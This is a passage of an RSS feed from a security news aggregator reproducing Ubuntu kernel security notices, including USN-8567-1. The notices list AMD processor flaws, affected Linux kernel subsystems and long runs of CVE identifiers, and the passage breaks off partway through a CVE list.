  - IPv6 networking;
  - MAC80211 subsystem;
  - Multipath TCP;
  - Open vSwitch;
  - Phonet protocol;
  - RDS protocol;
  - SCTP protocol;
  - SMC sockets;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - XFRM subsystem;
  - Integrity Measurement Architecture(IMA) framework;
  - SELinux security module;
  - ALSA framework;
  - HD-audio driver;
  - QCOM ASoC drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - KVM subsystem;
(CVE-2026-43490, CVE-2026-43492, CVE-2026-43495, CVE-2026-43496,
CVE-2026-43497, CVE-2026-43498, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45837, CVE-2026-45838,
CVE-2026-45839, CVE-2026-45840, CVE-2026-45841, CVE-2026-45842,
CVE-2026-45843, CVE-2026-45844, CVE-2026-45845, CVE-2026-45846,
CVE-2026-46104, CVE-2026-46105, CVE-2026-46106, CVE-2026-46107,
CVE-2026-46108, CVE-2026-46109, CVE-2026-46110, CVE-2026-46111,
CVE-2026-46112, CVE-2026-46113, CVE-2026-46114, CVE-2026-46116,
CVE-2026-46117, CVE-2026-46118, CVE-2026-46120, CVE-2026-46121,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46125,
CVE-2026-46126, CVE-2026-46127, CVE-2026-46128, CVE-2026-46129,
CVE-2026-46130, CVE-2026-46131, CVE-2026-46132, CVE-2026-46133,
CVE-2026-46134, CVE-2026-46136, CVE-2026-46138, CVE-2026-46139,
CVE-2026-46140, CVE-2026-46141, CVE-2026-46142, CVE-2026-46143,
CVE-2026-46144, CVE-2026-46145, CVE-2026-46146, CVE-2026-46147,
CVE-2026-46148, CVE-2026-46149, CVE-2026-46150, CVE-2026-46151,
CVE-2026-46152, CVE-2026-46153, CVE-2026-46154, CVE-2026-46156,
CVE-2026-46157, CVE-2026-46158, CVE-2026-46159, CVE-2026-46160,
CVE-2026-46161, CVE-2026-46162, CVE-2026-46163, CVE-2026-46164,
CVE-2026-46165, CVE-2026-46166, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46169, CVE-2026-46170, CVE-2026-46171, CVE-2026-46172,
CVE-2026-46173, CVE-2026-46174, CVE-2026-46175, CVE-2026-46176,
CVE-2026-46177, CVE-2026-46178, CVE-2026-46179, CVE-2026-46180,
CVE-2026-46181, CVE-2026-46182, CVE-2026-46183, CVE-2026-46184,
CVE-2026-46186, CVE-2026-46187, CVE-2026-46188, CVE-2026-46189,
CVE-2026-46190, CVE-2026-46191, CVE-2026-46192, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46196, CVE-2026-46197, CVE-2026-46198,
CVE-2026-46199, CVE-2026-46200, CVE-2026-46201, CVE-2026-46202,
CVE-2026-46203, CVE-2026-46204, CVE-2026-46205, CVE-2026-46206,
CVE-2026-46207, CVE-2026-46208, CVE-2026-46209, CVE-2026-46210,
CVE-2026-46211, CVE-2026-46212, CVE-2026-46213, CVE-2026-46214,
CVE-2026-46215, CVE-2026-46216, CVE-2026-46218, CVE-2026-46219,
CVE-2026-46220, CVE-2026-46221, CVE-2026-46222, CVE-2026-46223,
CVE-2026-46224, CVE-2026-46225, CVE-2026-46226, CVE-2026-46227,
CVE-2026-46228, CVE-2026-46229, CVE-2026-46230, CVE-2026-46231,
CVE-2026-46232, CVE-2026-46233, CVE-2026-46234, CVE-2026-46235,
CVE-2026-46236, CVE-2026-46238, CVE-2026-46239, CVE-2026-46240,
CVE-2026-46241, CVE-2026-46242, CVE-2026-46273, CVE-2026-46274,
CVE-2026-46275, CVE-2026-46290, CVE-2026-46291, CVE-2026-46292,
CVE-2026-46293, CVE-2026-46294, CVE-2026-46295, CVE-2026-46296,
CVE-2026-46297, CVE-2026-46298, CVE-2026-46299, CVE-2026-46301,
CVE-2026-46302, CVE-2026-46303, CVE-2026-46304, CVE-2026-46305,
CVE-2026-46306, CVE-2026-46307, CVE-2026-46308, CVE-2026-46309,
CVE-2026-46310, CVE-2026-46311, CVE-2026-46312, CVE-2026-46313,
CVE-2026-46314, CVE-2026-46315, CVE-2026-46317, CVE-2026-46318,
CVE-2026-46319, CVE-2026-46320, CVE-2026-46321, CVE-2026-46322,
CVE-2026-46324, CVE-2026-52911, CVE-2026-52912, CVE-2026-52913,
CVE-2026-52914, CVE-2026-52915, CVE-2026-52916, CVE-2026-52918,
CVE-2026-52919, CVE-2026-52920, CVE-2026-52921, CVE-2026-52922,
CVE-2026-52923, CVE-2026-52925, CVE-2026-52926, CVE-2026-52927,
CVE-2026-52928, CVE-2026-52931, CVE-2026-52932, CVE-2026-52934,
CVE-2026-52936, CVE-2026-52937, CVE-2026-52941, CVE-2026-52943,
CVE-2026-52944, CVE-2026-52949, CVE-2026-52950, CVE-2026-52951,
CVE-2026-52952, CVE-2026-52953, CVE-2026-52954, CVE-2026-52955,
CVE-2026-52956, CVE-2026-52957, CVE-2026-52958, CVE-2026-52959,
CVE-2026-52960, CVE-2026-52961, CVE-2026-52962, CVE-2026-52963,
CVE-2026-52964, CVE-2026-52965, CVE-2026-52967, CVE-2026-52968,
CVE-2026-52969, CVE-2026-52970, CVE-2026-52971, CVE-2026-52973,
CVE-2026-52974, CVE-2026-52975, CVE-2026-52976, CVE-2026-52977,
CVE-2026-52978, CVE-2026-52979, CVE-2026-52980, CVE-2026-52981,
CVE-2026-52982, CVE-2026-52983, CVE-2026-52984, CVE-2026-52985,
CVE-2026-52986, CVE-2026-52987, CVE-2026-52988, CVE-2026-52989,
CVE-2026-52990, CVE-2026-52991, CVE-2026-52992, CVE-2026-52993,
CVE-2026-52994, CVE-2026-52995, CVE-2026-52996, CVE-2026-52997,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53000, CVE-2026-53001,
CVE-2026-53002, CVE-2026-53003, CVE-2026-53004, CVE-2026-53005,
CVE-2026-53006, CVE-2026-53007, CVE-2026-53008, CVE-2026-53009,
CVE-2026-53010, CVE-2026-53011, CVE-2026-53012, CVE-2026-53013,
CVE-2026-53014, CVE-2026-53015, CVE-2026-53016, CVE-2026-53017,
CVE-2026-53018, CVE-2026-53019, CVE-2026-53020, CVE-2026-53021,
CVE-2026-53022, CVE-2026-53023, CVE-2026-53024, CVE-2026-53025,
CVE-2026-53026, CVE-2026-53027, CVE-2026-53028, CVE-2026-53029,
CVE-2026-53030, CVE-2026-53031, CVE-2026-53032, CVE-2026-53033,
CVE-2026-53034, CVE-2026-53035, CVE-2026-53036, CVE-2026-53037,
CVE-2026-53038, CVE-2026-53039, CVE-2026-53040, CVE-2026-53041,
CVE-2026-53042, CVE-2026-53043, CVE-2026-53044, CVE-2026-53045,
CVE-2026-53046, CVE-2026-53047, CVE-2026-53048, CVE-2026-53049,
CVE-2026-53050, CVE-2026-53051, CVE-2026-53052, CVE-2026-53053,
CVE-2026-53054, CVE-2026-53055, CVE-2026-53056, CVE-2026-53057,
CVE-2026-53058, CVE-2026-53059, CVE-2026-53060, CVE-2026-53061,
CVE-2026-53062, CVE-2026-53063, CVE-2026-53064, CVE-2026-53065,
CVE-2026-53066, CVE-2026-53067, CVE-2026-53068, CVE-2026-53069,
CVE-2026-53070, CVE-2026-53071, CVE-2026-53072, CVE-2026-53073,
CVE-2026-53074, CVE-2026-53075, CVE-2026-53076, CVE-2026-53077,
CVE-2026-53078, CVE-2026-53079, CVE-2026-53080, CVE-2026-53081,
CVE-2026-53082, CVE-2026-53083, CVE-2026-53084, CVE-2026-53085,
CVE-2026-53086, CVE-2026-53087, CVE-2026-53088, CVE-2026-53089,
CVE-2026-53090, CVE-2026-53091, CVE-2026-53092, CVE-2026-53093,
CVE-2026-53094, CVE-2026-53095, CVE-2026-53096, CVE-2026-53097,
CVE-2026-53098, CVE-2026-53099, CVE-2026-53100, CVE-2026-53101,
CVE-2026-53102, CVE-2026-53103, CVE-2026-53104, CVE-2026-53105,
CVE-2026-53106, CVE-2026-53107, CVE-2026-53108, CVE-2026-53109,
CVE-2026-53110, CVE-2026-53111, CVE-2026-53112, CVE-2026-53113,
CVE-2026-53114, CVE-2026-53115, CVE-2026-53116, CVE-2026-53117,
CVE-2026-53118, CVE-2026-53119, CVE-2026-53120, CVE-2026-53121,
CVE-2026-53122, CVE-2026-53123, CVE-2026-53124, CVE-2026-53125,
CVE-2026-53126, CVE-2026-53127, CVE-2026-53128, CVE-2026-53129,
CVE-2026-53130, CVE-2026-53174, CVE-2026-53277, CVE-2026-53278,
CVE-2026-53279, CVE-2026-53280, CVE-2026-53281, CVE-2026-53282,
CVE-2026-53283, CVE-2026-53284, CVE-2026-53285, CVE-2026-53286,
CVE-2026-53287, CVE-2026-53288, CVE-2026-53289, CVE-2026-53290,
CVE-2026-53291, CVE-2026-53292, CVE-2026-53293, CVE-2026-53294,
CVE-2026-53295, CVE-2026-53296, CVE-2026-53297, CVE-2026-53298,
CVE-2026-53299, CVE-2026-53300, CVE-2026-53301, CVE-2026-53302,
CVE-2026-53303, CVE-2026-53304, CVE-2026-53305, CVE-2026-53306,
CVE-2026-53307, CVE-2026-53308, CVE-2026-53309, CVE-2026-53310,
CVE-2026-53311, CVE-2026-53312, CVE-2026-53313, CVE-2026-53314,
CVE-2026-53315, CVE-2026-53316, CVE-2026-53317, CVE-2026-53318,
CVE-2026-53319, CVE-2026-53320, CVE-2026-53321, CVE-2026-53322,
CVE-2026-53323, CVE-2026-53324, CVE-2026-53357, CVE-2026-53358,
CVE-2026-53360, CVE-2026-53364, CVE-2026-53365)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8567-1: Linux kernel vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3681567/unix-server/usn-8567-1-linux-kernel-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681567/unix-server/usn-8567-1-linux-kernel-vulnerabilities/</guid>
<pubDate>Mon, 20 Jul 2026 17:46:49 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Remote Processor subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - SPI subsystem;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - Cryptographic library;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - Landlock security;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40135, CVE-2025-40150, CVE-2025-68175, CVE-2025-68239,
CVE-2025-68334, CVE-2025-68736, CVE-2025-71152, CVE-2025-71161,
CVE-2025-71203, CVE-2025-71221, CVE-2025-71269, CVE-2025-71287,
CVE-2025-71288, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23104, CVE-2026-23118,
CVE-2026-23138, CVE-2026-23154, CVE-2026-23157, CVE-2026-23171,
CVE-2026-23207, CVE-2026-23226, CVE-2026-23227, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23253, CVE-2026-23255,
CVE-2026-23270, CVE-2026-23271, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23279, CVE-2026-23281, CVE-2026-23284, CVE-2026-23285,
CVE-2026-23286, CVE-2026-23287, CVE-2026-23289, CVE-2026-23290,
CVE-2026-23291, CVE-2026-23292, CVE-2026-23293, CVE-2026-23296,
CVE-2026-23298, CVE-2026-23300, CVE-2026-23302, CVE-2026-23303,
CVE-2026-23304, CVE-2026-23306, CVE-2026-23307, CVE-2026-23308,
CVE-2026-23310, CVE-2026-23312, CVE-2026-23313, CVE-2026-23315,
CVE-2026-23317, CVE-2026-23318, CVE-2026-23319, CVE-2026-23321,
CVE-2026-23324, CVE-2026-23325, CVE-2026-23330, CVE-2026-23334,
CVE-2026-23335, CVE-2026-23336, CVE-2026-23339, CVE-2026-23340,
CVE-2026-23343, CVE-2026-23347, CVE-2026-23352, CVE-2026-23356,
CVE-2026-23357, CVE-2026-23359, CVE-2026-23360, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23395, CVE-2026-23396, CVE-2026-23397,
CVE-2026-23398, CVE-2026-23399, CVE-2026-23401, CVE-2026-23412,
CVE-2026-23413, CVE-2026-23414, CVE-2026-23418, CVE-2026-23419,
CVE-2026-23420, CVE-2026-23426, CVE-2026-23434, CVE-2026-23438,
CVE-2026-23439, CVE-2026-23440, CVE-2026-23441, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23447, CVE-2026-23448,
CVE-2026-23449, CVE-2026-23452, CVE-2026-23454, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31403, CVE-2026-31405, CVE-2026-31407, CVE-2026-31408,
CVE-2026-31409, CVE-2026-31412, CVE-2026-31413, CVE-2026-31414,
CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31426, CVE-2026-31427, CVE-2026-31428, CVE-2026-31429,
CVE-2026-31430, CVE-2026-31432, CVE-2026-31433, CVE-2026-31434,
CVE-2026-31438, CVE-2026-31439, CVE-2026-31440, CVE-2026-31441,
CVE-2026-31446, CVE-2026-31447, CVE-2026-31449, CVE-2026-31450,
CVE-2026-31451, CVE-2026-31452, CVE-2026-31453, CVE-2026-31454,
CVE-2026-31455, CVE-2026-31458, CVE-2026-31464, CVE-2026-31466,
CVE-2026-31467, CVE-2026-31469, CVE-2026-31470, CVE-2026-31473,
CVE-2026-31474, CVE-2026-31476, CVE-2026-31477, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31506, CVE-2026-31507, CVE-2026-31508,
CVE-2026-31509, CVE-2026-31510, CVE-2026-31511, CVE-2026-31512,
CVE-2026-31515, CVE-2026-31516, CVE-2026-31518, CVE-2026-31519,
CVE-2026-31520, CVE-2026-31521, CVE-2026-31522, CVE-2026-31523,
CVE-2026-31524, CVE-2026-31525, CVE-2026-31527, CVE-2026-31528,
CVE-2026-31530, CVE-2026-31532, CVE-2026-31540, CVE-2026-31542,
CVE-2026-31545, CVE-2026-31546, CVE-2026-31548, CVE-2026-31549,
CVE-2026-31550, CVE-2026-31551, CVE-2026-31552, CVE-2026-31554,
CVE-2026-31555, CVE-2026-31556, CVE-2026-31557, CVE-2026-31563,
CVE-2026-31565, CVE-2026-31566, CVE-2026-31570, CVE-2026-31575,
CVE-2026-31576, CVE-2026-31577, CVE-2026-31578, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31590, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31602,
CVE-2026-31603, CVE-2026-31604, CVE-2026-31605, CVE-2026-31606,
CVE-2026-31610, CVE-2026-31611, CVE-2026-31612, CVE-2026-31613,
CVE-2026-31615, CVE-2026-31616, CVE-2026-31617, CVE-2026-31618,
CVE-2026-31619, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31634, CVE-2026-31638, CVE-2026-31639,
CVE-2026-31642, CVE-2026-31645, CVE-2026-31646, CVE-2026-31648,
CVE-2026-31651, CVE-2026-31655, CVE-2026-31656, CVE-2026-31658,
CVE-2026-31660, CVE-2026-31661, CVE-2026-31662, CVE-2026-31664,
CVE-2026-31665, CVE-2026-31667, CVE-2026-31670, CVE-2026-31671,
CVE-2026-31672, CVE-2026-31673, CVE-2026-31674, CVE-2026-31675,
CVE-2026-31677, CVE-2026-31678, CVE-2026-31679, CVE-2026-31680,
CVE-2026-31681, CVE-2026-31683, CVE-2026-31684, CVE-2026-31686,
CVE-2026-31689, CVE-2026-31694, CVE-2026-31695, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31700,
CVE-2026-31701, CVE-2026-31702, CVE-2026-31704, CVE-2026-31705,
CVE-2026-31706, CVE-2026-31707, CVE-2026-31708, CVE-2026-31709,
CVE-2026-31711, CVE-2026-31712, CVE-2026-31714, CVE-2026-31715,
CVE-2026-31716, CVE-2026-31720, CVE-2026-31721, CVE-2026-31722,
CVE-2026-31723, CVE-2026-31724, CVE-2026-31725, CVE-2026-31726,
CVE-2026-31728, CVE-2026-31729, CVE-2026-31730, CVE-2026-31731,
CVE-2026-31737, CVE-2026-31738, CVE-2026-31740, CVE-2026-31741,
CVE-2026-31747, CVE-2026-31748, CVE-2026-31749, CVE-2026-31751,
CVE-2026-31752, CVE-2026-31754, CVE-2026-31755, CVE-2026-31756,
CVE-2026-31758, CVE-2026-31759, CVE-2026-31761, CVE-2026-31762,
CVE-2026-31763, CVE-2026-31767, CVE-2026-31768, CVE-2026-31770,
CVE-2026-31772, CVE-2026-31773, CVE-2026-31778, CVE-2026-31779,
CVE-2026-31780, CVE-2026-31781, CVE-2026-31788, CVE-2026-43007,
CVE-2026-43012, CVE-2026-43013, CVE-2026-43014, CVE-2026-43015,
CVE-2026-43016, CVE-2026-43017, CVE-2026-43018, CVE-2026-43019,
CVE-2026-43020, CVE-2026-43023, CVE-2026-43024, CVE-2026-43025,
CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030,
CVE-2026-43032, CVE-2026-43035, CVE-2026-43036, CVE-2026-43040,
CVE-2026-43041, CVE-2026-43043, CVE-2026-43044, CVE-2026-43046,
CVE-2026-43047, CVE-2026-43049, CVE-2026-43050, CVE-2026-43051,
CVE-2026-43052, CVE-2026-43054, CVE-2026-43056, CVE-2026-43057,
CVE-2026-43058, CVE-2026-43059, CVE-2026-43060, CVE-2026-43061,
CVE-2026-43062, CVE-2026-43064, CVE-2026-43065, CVE-2026-43066,
CVE-2026-43068, CVE-2026-43069, CVE-2026-43072, CVE-2026-43073,
CVE-2026-43074, CVE-2026-43075, CVE-2026-43076, CVE-2026-43079,
CVE-2026-43080, CVE-2026-43081, CVE-2026-43082, CVE-2026-43084,
CVE-2026-43085, CVE-2026-43086, CVE-2026-43088, CVE-2026-43089,
CVE-2026-43091, CVE-2026-43092, CVE-2026-43093, CVE-2026-43094,
CVE-2026-43098, CVE-2026-43099, CVE-2026-43103, CVE-2026-43104,
CVE-2026-43105, CVE-2026-43107, CVE-2026-43109, CVE-2026-43110,
CVE-2026-43111, CVE-2026-43112, CVE-2026-43113, CVE-2026-43119,
CVE-2026-43120, CVE-2026-43129, CVE-2026-43162, CVE-2026-43245,
CVE-2026-43252, CVE-2026-43265, CVE-2026-43281, CVE-2026-43324,
CVE-2026-43327, CVE-2026-43328, CVE-2026-43329, CVE-2026-43330,
CVE-2026-43332, CVE-2026-43333, CVE-2026-43334, CVE-2026-43336,
CVE-2026-43338, CVE-2026-43339, CVE-2026-43340, CVE-2026-43342,
CVE-2026-43343, CVE-2026-43345, CVE-2026-43350, CVE-2026-43355,
CVE-2026-43357, CVE-2026-43359, CVE-2026-43360, CVE-2026-43361,
CVE-2026-43362, CVE-2026-43363, CVE-2026-43365, CVE-2026-43366,
CVE-2026-43368, CVE-2026-43370, CVE-2026-43371, CVE-2026-43372,
CVE-2026-43373, CVE-2026-43377, CVE-2026-43380, CVE-2026-43381,
CVE-2026-43382, CVE-2026-43386, CVE-2026-43387, CVE-2026-43395,
CVE-2026-43397, CVE-2026-43405, CVE-2026-43408, CVE-2026-43409,
CVE-2026-43411, CVE-2026-43412, CVE-2026-43413, CVE-2026-43415,
CVE-2026-43419, CVE-2026-43420, CVE-2026-43421, CVE-2026-43424,
CVE-2026-43425, CVE-2026-43426, CVE-2026-43427, CVE-2026-43428,
CVE-2026-43429, CVE-2026-43430, CVE-2026-43432, CVE-2026-43436,
CVE-2026-43437, CVE-2026-43439, CVE-2026-43441, CVE-2026-43445,
CVE-2026-43448, CVE-2026-43449, CVE-2026-43450, CVE-2026-43451,
CVE-2026-43452, CVE-2026-43453, CVE-2026-43455, CVE-2026-43456,
CVE-2026-43457, CVE-2026-43458, CVE-2026-43459, CVE-2026-43466,
CVE-2026-43467, CVE-2026-43468, CVE-2026-43469, CVE-2026-43471,
CVE-2026-43472, CVE-2026-43473, CVE-2026-43475, CVE-2026-43476,
CVE-2026-43480, CVE-2026-43483, CVE-2026-43484, CVE-2026-43488,
CVE-2026-43490, CVE-2026-43491, CVE-2026-43492, CVE-2026-43495,
CVE-2026-43496, CVE-2026-43497, CVE-2026-43499, CVE-2026-43502,
CVE-2026-45834, CVE-2026-45835, CVE-2026-45836, CVE-2026-45838,
CVE-2026-45839, CVE-2026-45840, CVE-2026-45841, CVE-2026-45842,
CVE-2026-45843, CVE-2026-45844, CVE-2026-45845, CVE-2026-45846,
CVE-2026-45855, CVE-2026-45858, CVE-2026-45899, CVE-2026-45911,
CVE-2026-45920, CVE-2026-45924, CVE-2026-45942, CVE-2026-45943,
CVE-2026-45956, CVE-2026-45958, CVE-2026-45985, CVE-2026-45986,
CVE-2026-45987, CVE-2026-45989, CVE-2026-45991, CVE-2026-45994,
CVE-2026-45996, CVE-2026-45997, CVE-2026-45999, CVE-2026-46002,
CVE-2026-46003, CVE-2026-46004, CVE-2026-46005, CVE-2026-46006,
CVE-2026-46007, CVE-2026-46009, CVE-2026-46011, CVE-2026-46012,
CVE-2026-46015, CVE-2026-46016, CVE-2026-46018, CVE-2026-46019,
CVE-2026-46021, CVE-2026-46022, CVE-2026-46023, CVE-2026-46024,
CVE-2026-46026, CVE-2026-46027, CVE-2026-46031, CVE-2026-46033,
CVE-2026-46037, CVE-2026-46038, CVE-2026-46040, CVE-2026-46041,
CVE-2026-46044, CVE-2026-46046, CVE-2026-46047, CVE-2026-46049,
CVE-2026-46050, CVE-2026-46051, CVE-2026-46052, CVE-2026-46053,
CVE-2026-46056, CVE-2026-46058, CVE-2026-46061, CVE-2026-46062,
CVE-2026-46063, CVE-2026-46064, CVE-2026-46065, CVE-2026-46068,
CVE-2026-46069, CVE-2026-46070, CVE-2026-46072, CVE-2026-46073,
CVE-2026-46075, CVE-2026-46076, CVE-2026-46077, CVE-2026-46078,
CVE-2026-46079, CVE-2026-46080, CVE-2026-46082, CVE-2026-46083,
CVE-2026-46084, CVE-2026-46086, CVE-2026-46088, CVE-2026-46089,
CVE-2026-46090, CVE-2026-46091, CVE-2026-46092, CVE-2026-46094,
CVE-2026-46098, CVE-2026-46099, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46103, CVE-2026-46106, CVE-2026-46107, CVE-2026-46108,
CVE-2026-46110, CVE-2026-46111, CVE-2026-46112, CVE-2026-46113,
CVE-2026-46114, CVE-2026-46116, CVE-2026-46117, CVE-2026-46120,
CVE-2026-46121, CVE-2026-46122, CVE-2026-46123, CVE-2026-46124,
CVE-2026-46125, CVE-2026-46126, CVE-2026-46127, CVE-2026-46128,
